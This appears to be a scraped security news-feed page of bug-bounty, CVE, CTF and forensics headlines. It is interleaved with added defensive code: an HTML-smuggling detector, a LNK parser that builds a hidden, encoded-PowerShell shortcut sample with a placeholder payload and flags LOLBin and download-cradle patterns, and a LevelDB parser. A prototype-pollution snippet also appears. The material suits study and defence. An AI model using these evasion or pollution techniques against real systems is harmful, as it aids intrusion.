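    "autoclick": re.compile(r"\.click\s*\(\s*\)|dispatchEvent\s*\("),
}
B64_LITERAL_RE = re.compile(r"['\"]([A-Za-z0-9+/]{200,}={0,2})['\"]")
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)


def scan_html(html, min_hits=3):
    """Return the smuggling indicators found in the page's scripts, plus any
    large base64 literals decoded so their magic bytes can be inspected."""
    code = "\n".join(SCRIPT_RE.findall(html))
    hits = [name for name, rx in INDICATORS.items() if rx.search(code)]
    payloads = []
    for literal in B64_LITERAL_RE.findall(code):
        try:
            raw = base64.b64decode(literal, validate=True)
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
        payloads.append({"size": len(raw), "magic": raw[:4]})
    return {
        "indicators": hits,
        "payloads": payloads,
        # Require the chain AND an embedded blob: Blob/object-URL use on its own is common.
        "smuggling": len(hits) >= min_hits and bool(payloads),
    }


if __name__ == "__main__":
    print(scan_html(MALICIOUS_HTML))
    print(scan_html(BENIGN_HTML))
```

    Treat this as a triage aid rather than a filter: real lures split or reverse the base64 string, build it from char codes, or run the script through a packer, so a mail gateway or proxy that wants to block the technique has to render the page or hook the download in the browser rather than pattern-match the source.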
  • Open

    $1000: How I could have Hacked any account and become a billionaire overnight at a Top Crypto-Trading….
    After several emails with the security team [ which also includes depression & demotivat] and the HITCON team, the company Continue reading on InfoSec Write-ups »
    My Pentest Log -15- (HTML Injection in Wordpress)
    Greetings Everyone from Thrakion, Continue reading on Medium »
    Bug Bounty Tip 01
    Hello all, today will see one basic bug bounty tip or bug : Continue reading on Medium »
    Account Takeover By Password Reset Function.
    HI, This is Roshan Bhalerav (RBspider) how are you all hope doing great work and making good money. So today I will discuss on my last… Continue reading on Medium »
  • Open

    War in Ukraine / April 18
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Finding Elliot From Mr.Robot
    The other day I talked about the importance of props or objects around a target. But is that a viable option all the time? Let’s see! Continue reading on Medium »
  • Open

    LNK (Ab)use
    I've discussed LNK files a number of times in this blog, and to be honest, I really don't think that this is a subject that gets the attention it deserves. In my experience, and I humbly bow to collection bias here, LNK files are not as well understood as they (sh|c)ould be in the DFIR and CTI fields, which puts defenders at a disadvantage. When I suggest that LNK files aren't really well understood by DFIR and CTI teams, I'm basing that on my own experience with multiple such teams over the years, largely the result of direct interaction. Why is that? Well, the LNK file format is well documented at the MS site, and there have been a number of tools written over the years for parsing these files. I've even gone so far as to create the smallest functioning LNK file, based on the minimum fun…
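    The post above says the LNK format is well documented and that parsers exist; to show what "understanding the format" means in practice, here is an added example (my own, not the author's code or any of the tools he mentions) that parses the ShellLinkHeader and the StringData section of a .lnk from MS-SHLLINK and triages the result the way a DFIR analyst would. It builds a constructed LNK in memory, so the target path, the PowerShell switches and the encoded command (which decodes to the string PLACEHOLDER) are stand-ins, and the LinkTargetIDList and LinkInfo sections are skipped rather than decoded.

```python
import base64
import re
import struct
from datetime import datetime, timedelta, timezone

# ShellLinkHeader layout per MS-SHLLINK: 76-byte fixed header, then optional sections.
HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
STRING_DATA_ORDER = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                     (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                     (HAS_ICON_LOCATION, "icon_location")]
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_dt(ft):
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def dt_to_filetime(dt):
    return (dt - FILETIME_EPOCH) // timedelta(microseconds=1) * 10


def parse_lnk(data):
    """Parse header + StringData; skip (but step over) IDList and LinkInfo."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("bad HeaderSize")
    if data[4:20] != LINK_CLSID:
        raise ValueError("bad LinkCLSID")
    flags, attrs = struct.unpack_from("<II", data, 20)
    ctime, atime, wtime = struct.unpack_from("<QQQ", data, 28)
    file_size, icon_index, show_cmd = struct.unpack_from("<IiI", data, 52)
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        (id_list_size,) = struct.unpack_from("<H", data, off)
        off += 2 + id_list_size
    if flags & HAS_LINK_INFO:
        (link_info_size,) = struct.unpack_from("<I", data, off)
        off += link_info_size
    strings = {}
    for bit, name in STRING_DATA_ORDER:          # StringData appears in this fixed order
        if flags & bit:
            (count,) = struct.unpack_from("<H", data, off)
            off += 2
            if flags & IS_UNICODE:
                strings[name] = data[off:off + 2 * count].decode("utf-16-le")
                off += 2 * count
            else:
                strings[name] = data[off:off + count].decode("cp1252")
                off += count
    return {"flags": flags, "file_attributes": attrs, "file_size": file_size,
            "creation_time": filetime_to_dt(ctime), "access_time": filetime_to_dt(atime),
            "write_time": filetime_to_dt(wtime), "icon_index": icon_index,
            "show_command": show_cmd, "strings": strings,
            "trailing_bytes": len(data) - off}   # ExtraData blocks would live here


LOLBINS = ("powershell", "pwsh", "cmd.exe", "mshta", "rundll32", "regsvr32",
           "wscript", "cscript", "certutil")
ENC_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


def triage(parsed):
    """Flag the usual malicious-LNK tells and decode a -enc PowerShell argument."""
    s = parsed["strings"]
    findings, decoded = [], None
    target = " ".join(s.get(k, "") for k in ("relative_path", "working_dir", "name")).lower()
    if any(b in target for b in LOLBINS):
        findings.append("target is a script host / LOLBin")
    args = s.get("arguments", "")
    if any(t in args.lower() for t in ("-w hidden", "-nop", "bypass", "iex", "downloadstring")):
        findings.append("evasive PowerShell switches in arguments")
    m = ENC_RE.search(args)
    if m:
        findings.append("encoded command in arguments")
        try:
            decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            decoded = None
    if parsed["show_command"] == 7:             # SW_SHOWMINNOACTIVE: window never shown to the user
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE (window hidden from the user)")
    return {"findings": findings, "decoded_command": decoded}


def build_sample_lnk():
    """Constructed LNK: header + RelativePath + Arguments only (no IDList/LinkInfo)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    when = dt_to_filetime(datetime(2022, 4, 18, 16, 3, 0, tzinfo=timezone.utc))
    header = struct.pack("<I", HEADER_SIZE) + LINK_CLSID + struct.pack("<II", flags, 0x20)
    header += struct.pack("<QQQ", when, when, when)
    # FileSize, IconIndex, ShowCommand=7, HotKey, Reserved1, Reserved2, Reserved3
    header += struct.pack("<IiIHHII", 0, 0, 7, 0, 0, 0, 0)
    body = b""
    for text in (r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "-nop -w hidden -enc UABMAEEAQwBFAEgATwBMAEQARQBSAA=="):  # placeholder
        body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + body


if __name__ == "__main__":
    parsed = parse_lnk(build_sample_lnk())
    print(parsed["strings"], parsed["show_command"], parsed["write_time"])
    print(triage(parsed))
```

    On a real sample the three FILETIMEs, the target's FileSize and the skipped IDList/LinkInfo (volume serial, drive type, local base path) are what tie the shortcut to the machine it was built on; the StringData and ShowCommand are what tell you whether it is hostile.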
  • Open

    Need help to Exploit Instagram.
    Can someone find a way to react to a message in dm with text (instead of emoji) and tell me how to do it. Using chrome on laptop. Pleaseeeeeeeeeeee... helpcode #exploit submitted by /u/Old-Imagination8499 [link] [comments]
  • Open

    SecWiki News 2022-04-19 Review
    Fragmentation of cybercrime and the systematization of criminal governance by ourren; A brief analysis of the various ways to exploit SSRF by ourren; Analysis report on the "Hive" malicious-code attack-and-control weapon platform by ourren; Design approach for the Digital China Internet-of-Vehicles competition challenges by ourren; How machine learning empowers binary code similarity analysis by ourren; TP-Link WDR-7660 security research: building a serial-port (UART) CMD-based debugger by ourren; Go template meets YAML deserialization: an analysis of CVE-2022-21701 by ourren; Is community-sourced threat intelligence actually useful? by Avenger. For more of the latest articles, visit SecWiki.
  • Open

    Invitation Email is resent as a Reminder after invalidating pending email invites
    Mattermost disclosed a bug submitted by mr_anksec: https://hackerone.com/reports/1486820 - Bounty: $150
    xss on [developers.mtn.com]
    MTN Group disclosed a bug submitted by pisarenko: https://hackerone.com/reports/924851
  • Open

    Resolving System Service Numbers using the Exception Directory - @MDSecLabs
    submitted by /u/dmchell [link] [comments]
  • Open

    Book giveaway | Still looking for a penetration-testing bible? This book is all you need!
    Is there a scientific, step-by-step "hacker handbook" that combines theory with practice?
    $655,000 vanishes: hackers obtain MetaMask seed phrase from an iCloud backup
    MetaMask has recently issued a warning to its iOS users.
    Newly discovered zero-click iPhone exploit used by NSO spyware
    Digital-threat researchers at Citizen Lab have discovered a new zero-click iMessage exploit.
    New dark-web marketplace Industrial Spy is selling data
    A dark-web marketplace called Industrial Spy has recently been unusually active, selling or giving away data stolen from companies.
    Beanstalk attacked for a $180 million loss; attacker donates $250,000 to Ukraine
    The Ethereum-based stablecoin protocol Beanstalk Farms suffered a flash-loan attack; the project later acknowledged the attack and announced that all interaction with its contracts was suspended.
    Fake upgrade sites are back: Windows 11 has become a favorite malware lure
    Hackers are using fake Windows 11 upgrades to distribute new malware that steals victims' browser data and even cryptocurrency wallets.
    No let-up: Anonymous keeps attacking Russia
    Recently the well-known international hacker collective Anonymous, together with other hacking groups, launched a new round of attacks on Russian government agencies and organizations.
  • Open

    Vaf Cross-platform Advanced Web Fuzzer
    Continue reading on Medium »

  • Open

    Cisco Wireless LAN Controller Interface Authentication Bypass Vulnerability
    Article URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-auth-bypass-JRNhV4fF Comments URL: https://news.ycombinator.com/item?id=31078246 Points: 2 # Comments: 0
    Arbitrary file write vulnerability in GNU gzip's zgrep utility
    Article URL: https://access.redhat.com/security/cve/cve-2022-1271 Comments URL: https://news.ycombinator.com/item?id=31076009 Points: 97 # Comments: 37
  • Open

    Video demonstrating Office VSTO payload delivery (great replacement for macros :) )
    submitted by /u/an0n_r0 [link] [comments]
    Red Team Infrastructure
    Hi everyone it’s been a while since I’ve posted but been a wild ride on Red Team stuff for a while. I wanted too share another part of Red Team Notes that I’ve been working for helping beginners as always! Trying to jump onto this category of hacking, as always enjoy! Please reach out if any errors! https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-infrastructure/red-team-infrastructure submitted by /u/Dmcxblue [link] [comments]
  • Open

    MITRE Engenuity ATT&CK results are out
    submitted by /u/DanielWalker12 [link] [comments]
  • Open

    LUKS encryption
    Reaching out for some help. I’m not familiar at all with Linux. I have an HDD that was ATA password protected. I was able to take it to our state police and they removed it with their Atola. I imaged the drive and found that it’s encrypted with LUKS. I have no memory image as the computer was dropped off at out PD by a reporting party. How/can you get past the LUKS encryption? It’s currently running through Passware as I type this. Case is involving CSAM. submitted by /u/HorseAdministrative7 [link] [comments]
    Research sources for low level forensics?
    So I am working on a challenge last week and an image was taken from a Iphone SIM and using only hex editor we need to find unidentifiable information, location, phone number, carrier and some random information was removed and we need to identify what data is missing. I attempted to research on google but it is almost all casual questions about recovering phone data. I attempted stack overflow and reddit but neither seemed to have any information on the subject. What are some terms or sources I could have used to research this process? What is the stack overflow for forensic professionals. (By the way, I did not win the challenge) submitted by /u/CoreRun [link] [comments]
  • Open

    Stored XSS To Other Users Via Messages
    Welcome back, I hope everyone had a good bank holiday Easter. Continue reading on System Weakness »
    Broken Authentication Login With Google
    Hello Guys! Continue reading on Medium »
    Grow With Us
    Bug Zero is striving to share knowledge among the people and we are keen to promote your voice through our medium. Continue reading on Bug Zero »
    How I got My first Disclosed XSS
    Intro : Continue reading on Medium »
    Hacking the University in a Few Steps
    Escalating a Wrong Date to Get Code Execution Continue reading on Medium »
    Hack Wi-Fi Using Aircrack-ng
    Hello Everyone! In this article I tell you how to hack and crack wifi password using aircrack-ng which is a terminal based tool. Continue reading on Medium »
  • Open

    What's the name of the subject I'm trying to learn about?
    So I'm working my way through the TryHackMe penetration tester course and I'm finding myself lacking a fundamental understanding of things like requests (GET/POST/etc) and things that I would need to understand before being able to know what anything is with Burp Suite, and I'm having a hard time figuring out what the topic is called that I need to learn more about. For example, I'm feeling stuck on PHP file inclusion attacks because I don't understand what requests actually are, or if there is anything besides GET and POST. Do I just need to learn how PHP works, or is there a more broad subject that would include that? submitted by /u/GrassyNotes [link] [comments]
    How can one prepare for Attack/Defense CTF's?
    Hey AskNetsec, I'm curious about Attack / Defense CTF's. They seem really exciting but i'm not sure how exactly to prepare for one (because it sometimes involves exploiting services that were made specifically for the competition). What skills do Attack/Defense CTF's train? How can one best prepare for them? Full disclosure, I'm working on a little YT video on Attack/Defense CTF's for my "Learn with Intern" series so this post will help inform that. Here is an example: https://www.youtube.com/watch?v=OVEnPi__I_8 TLDR: What skills do Attack/Defense CTF's train? How can one best prepare for them? submitted by /u/NSP781 [link] [comments]
    Aspiring Junior Penetration Tester Question/Tips
    Hello reddit community. I am an aspiring Junior Pen Tester. I passed the eJPT exam back in November, and I am trying to gain some knowledge towards penetration testing through certifications and TryHackMe/HTB. Right now, I have around $500 to invest in a certification. My question is the following: After eJPT that I already passed, should I go for eCCPTv2, CRTP (to gain AD knowledge) or PNPT? I know that many of you will insist to go for the OSCP. But right now I cannot afford it. What would be the best next step? Thank you very much in advance submitted by /u/apostonikos [link] [comments]
  • Open

    An attacker can archive and unarchive any structured scope object on HackerOne
    HackerOne disclosed a bug submitted by ahacker1: https://hackerone.com/reports/1501611 - Bounty: $12500
    SSRF occurrence in website preview used by LINE Official Account Manager (https://manager.line.biz)
    LINE disclosed a bug submitted by jafarakhondali: https://hackerone.com/reports/1131608 - Bounty: $100
    Deleting someone else's profile image with a GraphQL query in programming education service (https://entry.line.me)
    LINE disclosed a bug submitted by tosun: https://hackerone.com/reports/952095 - Bounty: $600
    Use of unreleased features in programming education service (https://entry.line.me)
    LINE disclosed a bug submitted by tosun: https://hackerone.com/reports/975428 - Bounty: $100
    SSRF restricted to HTTP/HTML on LINE Social Plugins (https://social-plugins.line.me/)
    LINE disclosed a bug submitted by duahaubadao: https://hackerone.com/reports/860939 - Bounty: $1350
  • Open

    War in Ukraine / April 17
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    TAMU CTF 2022 Writeup — OSINT: Gilberto’s Brother
    This challenge provides little other than a screenshot seen below and the directive to find birth dates for both Gilberto and his unnamed… Continue reading on Medium »
    4 services for monitoring weather conditions
    Top services for collecting meteorological information, observing atmospheric phenomena and forecasting the weather. Online climate and weather maps. Continue reading on KR. LABORATORIES IT BLOG »
    Best Chrome extensions for OSINT!
    Let’s try to turn the standard CHROME browser into a full-fledged OSINT explorer tool. Continue reading on Medium »
    Kidnapping of civilians: Russia’s war of intimidation
    The Russian occupation deliberately kidnapped civilians, journalists and politicians in order to break down the Ukrainian resistance in… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-18 Review
    SecWiki Weekly (Issue 424) by ourren. For more of the latest articles, visit SecWiki.
  • Open

    Windows Red Team Cheat Sheet
    Windows for Red Teamers Continue reading on Medium »
  • Open

    CVE-2022-21907 Microsoft HTTP Protocol Stack DoS PoC
    Article URL: https://github.com/polakow/CVE-2022-21907 Comments URL: https://news.ycombinator.com/item?id=31072275 Points: 3 # Comments: 0
  • Open

    Prototype Pollution
    🔍 Introduction
    Prototype Pollution is a security issue that arises from a flaw in JavaScript processing logic when the prototype of Objects can be modified. If an Object's prototype can be changed, the intended logic can be bypassed, or the DOM can be influenced to cause further problems such as XSS.
    let myObj = {}
    myObj['__proto__']['a'] = 'a'  // writes property a onto myObj's prototype (__proto__), i.e. Object.prototype
    console.log(myObj.a)           // 'a'
    let newObj = {}                // afterwards create a new Object called newObj,
    console.log(newObj.a)          // and the log shows 'a' here too: it inherits the polluted Object.prototype
  • Open

    How Mobile Operators should Thousands of Dollars because of SMS Malware.
    No content preview
  • Open

    FreeBuf Morning Report | GitHub blocks accounts of two large Russian banks; financial-platform vulnerability could leak bank information
    As part of US blocking sanctions, GitHub has begun suspending accounts of Russian-registered users and blocking the accounts of Russian financial institutions.
    A new wave of DDoS: analysis of TCP reflection/amplification attacks abusing middleboxes
    Attackers can exploit flaws in how some network middleboxes identify TCP sessions to carry out an entirely new kind of DDoS reflection-amplification attack.
    GitHub bans some Russian developer accounts
    GitHub has started blocking the accounts of Russian developers at companies under US sanctions.
    $540 million stolen in one month: Lazarus Group funds missiles with the proceeds
    The US Treasury has attributed the March theft of $540 million from Ronin Network, the Axie Infinity sidechain, to the Lazarus Group.
    Conti ransomware group claims attack on Nordex
    German wind-turbine manufacturer Nordex recently posted a statement on its website saying it had suffered a cyberattack.
    GitHub: stolen OAuth tokens used to exfiltrate data from dozens of organizations
    GitHub disclosed on April 15 that attackers were using stolen OAuth user tokens to download data from private repositories.
    How enterprises can build a "zero-cost" security program | FreeBuf buyer-side community livestream recap
    On the evening of April 14, the FreeBuf buyer-side community held its first internal livestream. Fan Zhengyi, head of information security at OPPLE Lighting Group, shared online how an enterprise can build a "zero-cost" security program.
    Start from "zero", rebuild trust | Call for talks opens for the CIS Zero Trust Security Forum
    For this forum FreeBuf has invited many well-known cybersecurity figures to bring attendees more comprehensive and more valuable talks.
  • Open

    CVE-2022-22954 VMware Workspace ONE Access Server-Side Template Injection RCE
    Author: Y4er. Original link: https://y4er.com/post/cve-2022-22954-vmware-workspace-one-access-server-side-template-injection-rce/ Environment setup: the image provided by r-shi, identity-manager-21.08.0.1-19010796_OVF10.ova. When importing the OVA you need to set the FQDN, otherwise during installation the connection...
    Java 反序列化注入冰蝎内存马相关踩坑笔记
    Author: Y4er. Original link: https://y4er.com/post/java-deserialization-inject-behinder-memshell-note/ A friend asked me to help inject an in-memory shell (Behinder memshell) using the CommonsBeanutils (cb) chain with no CommonsCollections (cc) dependency. I figured this would be trivial, but what followed was an endless series of pitfalls. Modifying the cb chain to remove the cc dependency: p牛 has already covered this, so without further comment here is the code: public Object getObject(...
    Go template 遇上 yaml 反序列化 CVE-2022-21701 分析
    Author: lazydog. Original link: http://noahblog.360.cn/go-template-meets-yaml-cve-2022-21701/ Preface: This article analyzes CVE-2022-21701, a privilege-escalation vulnerability in Istio, and explains the vulnerability that arises when Go templates meet YAML deserialization. It resembles "template injection", but rather than relying solely on the template engine's features, it combines them with YAML parsing to cause...
  • Open

    CVE-2022-21882 Win32k内核提权漏洞深入分析
    1. Vulnerability introduction  2. Affected versions  3. Analysis environment  4. Background  5. Root cause  6. Exploitation flow  6.1 Triggering the user-mode callback  6.2 Hooking the callback function  6.3 Changing the window mode to mode 1  6.4 Returning a forged offset from the callback  6.5 Leaking the kernel window data structure  6.6 Memory layout  7. Exploit analysis and debugging  8. Two privilege-escalation methods  8.1 Setting the token  8.2 Modifying Privileges  9. Patch analysis  10. References
    CVE-2022-21882 is a local privilege-escalation vulnerability in Windows that Microsoft patched in the January 2022 security update. This article analyzes the root cause of the vulnerability and the exploit in detail.
    1 Vulnerability introduction
    CVE-2022-21882 is a bypass of the fix for CVE-2021-1732 and is a type-confusion vulnerability in the win32k driver. An attacker in user mode can call GUI APIs that make kernel calls such as xxxMenuWindowProc, xxxSBWndProc, xxxSwitchWndProc and xxxTooltipWndProc; these kernel functions trigger the callback xxxClientAllocWindowClassExtraBytes. The attacker can intercept this callback by hooking xxxClientAllocWindowClassExtraBytes in the KernelCallbackTable, and inside it use NtUserConsoleControl to set the ConsoleWindow flag on the tagWNDK object, thereby changing the window type. After the callback returns, the system does not check whether the window type has changed, and because of the type confusion it references the wrong data. The difference before and after the flag change is that, before the flag is set, the system considers tagWNDK.pE…

  • Open

    Windows Persistence: Registry Run Keys
    After getting a foothold on a target, the next goal should be to persist on that target. If no persistence method is utilized, then the… Continue reading on Medium »
    CrowSec EdTech Write-Up: Hijacking
    This article is about the CTF (Capture The Flag) called “Hijacking”, where I learned much about new techniques of privillege escalation… Continue reading on Medium »
    The Story of A Simple SentinelOne Hash Blacklist Bypass
    (Originally Posted on 2021–06–02) Continue reading on Medium »
  • Open

    Caught some kind of DNS server running in a local IP. Virus? Spyware?
    Hi everyone, I caught some apps unrelated to each other trying to connect to 10.0.0.241. My local LAN is in the 192.168.x.x range so there should be nothing in 10.0.0. Investigated and apparently there's a DNS server I knew nothing about running locally. WTF is this mofo, how do I kill it, is this a sign of some kind of infection? I did an nmap and it showed this:
    Starting Nmap 7.92 ( https://nmap.org ) at (date and time)
    Nmap scan report for 10.0.0.241
    Host is up (0.029s latency).
    Not shown: 994 closed tcp ports (conn-refused)
    PORT     STATE    SERVICE
    53/tcp   open     domain
    389/tcp  filtered ldap
    636/tcp  filtered ldapssl
    1099/tcp filtered rmiregistry
    3268/tcp filtered globalcatLDAP
    3269/tcp filtered globalcatLDAPssl
    Nmap done: 1 IP address (1 host up) scanned in 23.27 seconds
    Then I did a traceroute and saw this:
    traceroute to 10.0.0.241 (10.0.0.241), 64 hops max, 52 byte packets
     1  * 10.28.18.1 (10.28.18.1)  33.628 ms  27.414 ms
     2  2a28115c3952 (10.0.0.241)  27.610 ms  27.397 ms  31.312 ms
    submitted by /u/my_humble_chapeau [link] [comments]
    I'm new to Incident Response. Any Tips?
    Hey there, I'm starting to be more involved in our newly formed Incident Response Team. Basically a group of individuals discussing the further operations after a vuln appears. Do you guys have any tips? submitted by /u/No_Bumblebee_5793 [link] [comments]
    My online school is having some kind of cyber attacks on our Zoom classes
    Im running an online school with some paid and unpaid students overseas, including China, and we recently started having attacks that make the Zoom meeting software behave in unusual ways and crash. After I turned off my router (this resets the local IP) the attacks stopped for a few minutes, but then resumed. Today after my PC was off for a long period of time as soon as I started a zoom meeting the program lagged/glitched and crashed, I had to cancel the meeting. I fired up a VPN immediately and restarted, this fixed the problem. My thinking is that if I connect to a specific students computer, we the issue is coming from overseas, that the attacks will start again, and could maybe they could even cause us a problem by getting around the VPN? I’m just one person running a very small bu…
    If Facebook is selling your information
    Then where can I buy it? submitted by /u/zethara [link] [comments]
  • Open

    TryHackMe writeup: Bebop
    No content preview
    THM Writeup: VulnNet Roasted
    No content preview
    Devzat from HackTheBox — Detailed Walkthrough
    No content preview
    Tech_Supp0rt: 1 (Tryhackme)
    No content preview
  • Open

    Ti West’s “X”: an Overrated Throwback
    A work of art or entertainment can have a lot on its mind and under its hood, but if you don’t like it, you don’t like it, and no amount… Continue reading on Fanfare »
    X: Slasher gives horror fans what they want
    A24's new film is a fun slasher and an ambitious project that respects the genre's dogmas and plays with caricatures of the industry's… Continue reading on Medium »
  • Open

    THCon CTF Writeup - SHA-1 exploitation, PHP LFI and RCE
    submitted by /u/GuyLewin [link] [comments]
    Semgrep rules for smart contracts based on DeFi exploits
    submitted by /u/iterablewords [link] [comments]
    Packets Remystified: Broadcast Brujería
    submitted by /u/0xdea [link] [comments]
    Spock SLAF is a Shared Library for Application Firewall "SLAF". It has the purpose to protect any service that uses the OpenSSL library. The SLAF inserts hooking to intercept all communication to detect security anomalies and block and log attacks.
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    Web Attack Cheat Sheet
    Discovering Continue reading on Medium »
    Knock Subdomain Scan
    Knock Subdomain Scan v5.3.0 Continue reading on Medium »
    Open Redirection & Broken Link Hijacking
    Let us learn about Open Redirection & Broken Link Hijacking Continue reading on Medium »
    SQL Injection in Harvard’s Subdomain
    Hi there! I’m Bibek Neupane from Nepal. In this first-ever write-up of mine, I’ll try to cover my story of finding a SQL Injection on… Continue reading on Pentester Nepal »
  • Open

    War in Ukraine / April 16
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Where’s Trump?
    Pin Pointing Trump Continue reading on Medium »
    Geo Location From Mr.Robot
    Where’s Elliot? Continue reading on Medium »
    Identification of the owner of Google Docs
    Today we will study the possibility of identifying the owner of Google documents. In the simplest version, you just need to open the file… Continue reading on Medium »
  • Open

    Leveldb File Forensics
    I want to examine the push notifications in a .ldb file. I know I can see the notifications, after some parsing, through a hex editor, but thought there has to be a better way. Does anyone know of a tool to allow me to view/dump the key values for an .ldb file? There's a great writeup from GIAC on how .ldb files work: https://www.giac.org/paper/gcih/20579/google-chrome-notification-analysis-in-depth/128522 But no mention of how to parse the information. I've tried a few GitHub tools without success: https://github.com/google/leveldb -- successfully compiled the tool. This tool seemed the most promising. I tried using the command:
    ./leveldbutil dump [filename].ldb
    but received the following error:
    Corruption: corrupted compressed block contents
    I don't think the file is corrupted, because when I view the contents in a hex editor, I can read the key-values from the Push Notifications. https://github.com/SuperMarcus/LevelDBViewer/releases - couldn't open the file. https://github.com/markmckinnon/Leveldb-py - couldn't open the file. Any suggestions?
    edit: Just tried a Python package called Plyvel: https://plyvel.readthedocs.io/en/latest/
    >>> import plyvel
    >>> db = plyvel.DB("006264.ldb", compression=None)
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
      File "plyvel/_plyvel.pyx", line 247, in plyvel._plyvel.DB.__init__
      File "plyvel/_plyvel.pyx", line 88, in plyvel._plyvel.raise_for_status
    plyvel._plyvel.IOError: b'IO error: 006264.ldb/LOCK: Not a directory'
    submitted by /u/Praxxer1 [link] [comments]
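    For anyone who ends up reading .ldb contents by hand, here is an added example (my own, not from the post or from any of the tools it lists) of the entry format inside a LevelDB data block: each entry is three varints (shared key prefix length, unshared key length, value length) followed by the key suffix and the value, and the block ends with a restart-point array and its count. The key stored is an internal key, the user key plus an 8-byte little-endian tail holding the sequence number and a type byte (1 = value, 0 = deletion tombstone), which is why deleted notifications are still recoverable. The sample entries are constructed; the block is built uncompressed, which is what you have after decompressing a snappy block (the 5-byte trailer after each block in the file starts with the compression type, 0 = none, 1 = snappy), so this code does not locate blocks inside a file or undo compression.

```python
import struct

KTYPE_DELETION, KTYPE_VALUE = 0, 1


def _put_varint(n):
    """LevelDB varint32: 7 bits per byte, high bit = continuation."""
    out = bytearray()
    while n >= 0x80:
        out.append((n & 0x7F) | 0x80)
        n >>= 7
    out.append(n)
    return bytes(out)


def _get_varint(buf, off):
    result, shift = 0, 0
    while True:
        b = buf[off]
        off += 1
        result |= (b & 0x7F) << shift
        if not b & 0x80:
            return result, off
        shift += 7


def internal_key(user_key, seq, kind=KTYPE_VALUE):
    """user_key || little-endian ((seq << 8) | type)."""
    return user_key + struct.pack("<Q", (seq << 8) | kind)


def split_internal_key(ikey):
    (packed,) = struct.unpack("<Q", ikey[-8:])
    return ikey[:-8], packed >> 8, packed & 0xFF


def build_block(entries, restart_interval=16):
    """Encode (internal_key, value) pairs the way BlockBuilder does, with
    prefix compression reset at every restart point."""
    out, restarts, prev = bytearray(), [], b""
    for i, (key, value) in enumerate(entries):
        shared = 0
        if i % restart_interval == 0:
            restarts.append(len(out))          # restart: key stored in full
        else:
            limit = min(len(prev), len(key))
            while shared < limit and prev[shared] == key[shared]:
                shared += 1
        out += _put_varint(shared) + _put_varint(len(key) - shared) + _put_varint(len(value))
        out += key[shared:] + value
        prev = key
    for r in restarts:
        out += struct.pack("<I", r)
    out += struct.pack("<I", len(restarts))
    return bytes(out)


def parse_block(block):
    """Walk every entry of an uncompressed data block, reconstructing full keys."""
    (num_restarts,) = struct.unpack_from("<I", block, len(block) - 4)
    data_end = len(block) - 4 - 4 * num_restarts
    off, prev, entries = 0, b"", []
    while off < data_end:
        shared, off = _get_varint(block, off)
        non_shared, off = _get_varint(block, off)
        value_len, off = _get_varint(block, off)
        key = prev[:shared] + block[off:off + non_shared]
        off += non_shared
        value = block[off:off + value_len]
        off += value_len
        entries.append((key, value))
        prev = key
    return entries


def dump_block(block):
    """Human-readable rows: (user key, sequence, VAL/DEL, value)."""
    rows = []
    for ikey, value in parse_block(block):
        user_key, seq, kind = split_internal_key(ikey)
        rows.append((user_key.decode("utf-8", "replace"), seq,
                     "DEL" if kind == KTYPE_DELETION else "VAL", value))
    return rows


# Constructed sample: notification-style keys, including one record that was
# deleted at seq 9 but whose seq-8 value is still physically present.
SAMPLE_ENTRIES = [
    (internal_key(b"1_https://example.com_notif:0001", 7), b'{"title":"Meeting","body":"10:00"}'),
    (internal_key(b"1_https://example.com_notif:0002", 9, KTYPE_DELETION), b""),
    (internal_key(b"1_https://example.com_notif:0002", 8), b'{"title":"Old","body":"deleted later"}'),
    (internal_key(b"2_https://other.example_notif:0001", 3), b'{"title":"Hi"}'),
]

if __name__ == "__main__":
    for row in dump_block(build_block(SAMPLE_ENTRIES)):
        print(row)
```

    The "LOCK: Not a directory" error in the post is plyvel (and leveldbutil) expecting the database directory, not a single .ldb file; the "corrupted compressed block" message is the snappy path failing, so a block-level parser like this one is the fallback when the directory as a whole will not open.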
  • Open

    SecWiki News 2022-04-17 Review
    No news updated today. For more of the latest articles, visit SecWiki.
  • Open

    [Cullinan #32] Add SSE and Kiterunner!
    This is Cullinan log #32. I newly added the SSE and Kiterunner pages, and there were updates to the threat modeling, ssti, xss, ssrf and oast pages. New: Add SSE (Server-Sent Events); Add Kiterunner. Update: Add resource to cullinan > threat modeling; Add tools to cullinan > ssti; Add short xss to cullinan > xss; Add combined xss to cullinan > xss; Add bypass with 20x to cullinan > ssrf; Add bypass with toctou to cullinan > ssrf; Add dns pinning to cullinan > ssrf; Add bypass with ffmpeg to cullinan > ssrf; Add bypass techniques to cullinan > oast. And once the data is reasonably organized, the blog's tag(e.
  • Open

    Some movies (not all checked so NSFW) WARNING VERY SLOW
